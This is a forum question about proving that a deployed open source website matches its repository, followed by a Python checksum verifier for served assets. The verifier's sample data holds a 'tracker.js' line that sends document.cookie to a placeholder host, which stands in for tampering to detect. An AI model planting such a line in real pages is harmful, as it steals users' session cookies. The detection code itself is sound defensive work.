When developing open source software, how could someone prove to the user that the code running is actually the same as the code in the repository?
What if I were to develop an open source website that handles sensitive data? In theory a user could check the source code to see that nothing weird happens with their data, like sending user info to a third-party service. But how can you prove that the code in the repository isn't being edited somewhere else before it is deployed to the server?
Or maybe a more immediate example: how can Ben prove that this website is actually using the code in the Forem repository (Forem being the open source codebase that powers dev.to)?
Maybe I am overlooking something really obvious. I am aware that when it comes to downloading files you can use checksums to confirm they are the same, but can you apply the same technique to a website? You could put the checksum generated from the repository at the bottom of the website, but that doesn't really prove anything.
Have you ever thought about this? Got experience with this? Let's hear it.
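To make the checksum idea from the question concrete, here is an added example (my own code, not from the original post or from the Forem project) showing the part of a website that a checksum can actually verify: the files the server delivers to the client. It assumes a hypothetical manifest format `{path: sha256-hex}` produced from a repository checkout, and it uses constructed in-memory byte strings in place of a real checkout and real HTTP responses so it runs offline.

```python
"""Check that the assets a site serves match a build from its repository.

Added example, not code from the original post or the Forem project. The
manifest format {path: sha256-hex} is an assumption; REPO_FILES and
SERVED_FILES are constructed sample data standing in for a git checkout
and for the bytes returned by HTTP requests to the live site.
"""
import hashlib
from typing import Dict, Mapping


def sha256_hex(data: bytes) -> str:
    """Hex SHA-256 of a byte string (the same value `sha256sum` prints)."""
    return hashlib.sha256(data).hexdigest()


def build_manifest(repo_files: Mapping[str, bytes]) -> Dict[str, str]:
    """Hash every client-delivered file from a repository checkout.

    In a real deployment this would run over the build output produced from
    a specific commit, so the manifest is tied to that commit.
    """
    return {path: sha256_hex(content) for path, content in repo_files.items()}


def verify_served(manifest: Mapping[str, str],
                  served: Mapping[str, bytes]) -> Dict[str, str]:
    """Compare what the server actually sent against the manifest.

    Returns {path: status} where status is one of:
      "ok"         served bytes hash to the manifest value
      "mismatch"   served bytes differ from the repository build
      "missing"    the repository build has the file, the server did not send it
      "unexpected" the server sent a file the repository build does not contain
    """
    report: Dict[str, str] = {}
    for path, expected in manifest.items():
        if path not in served:
            report[path] = "missing"
        elif sha256_hex(served[path]) == expected:
            report[path] = "ok"
        else:
            report[path] = "mismatch"
    for path in served:
        if path not in manifest:
            report[path] = "unexpected"
    return report


# Constructed sample "repository build": two client-side files.
REPO_FILES: Dict[str, bytes] = {
    "app.js": b"document.title = 'hello';\n",
    "style.css": b"body { margin: 0; }\n",
}

# Constructed sample "live site": app.js is untouched, style.css has an extra
# rule appended after the build, and a file not in the repository appears.
SERVED_FILES: Dict[str, bytes] = {
    "app.js": b"document.title = 'hello';\n",
    "style.css": b"body { margin: 0; }\nbody { background: url('//example.invalid/b.gif'); }\n",
    "tracker.js": b"new Image().src = '//example.invalid/t?' + document.cookie;\n",
}


def example_report() -> Dict[str, str]:
    """Run the check over the constructed sample data."""
    return verify_served(build_manifest(REPO_FILES), SERVED_FILES)


if __name__ == "__main__":
    for path, status in sorted(example_report().items()):
        print(f"{status:10} {path}")
```

On the sample data this reports `ok` for `app.js`, `mismatch` for `style.css` and `unexpected` for `tracker.js`. Against a real site you would fill `SERVED_FILES` with the bytes each URL returns (for example `curl -s URL | sha256sum`) and generate the manifest from a build of the commit the operator claims to be running. The caveat is the one the question already hints at: this only covers what reaches the client. Server-side code, which is where sensitive data is actually handled, never leaves the server, so no checksum the user can compute from the outside tells them what it is.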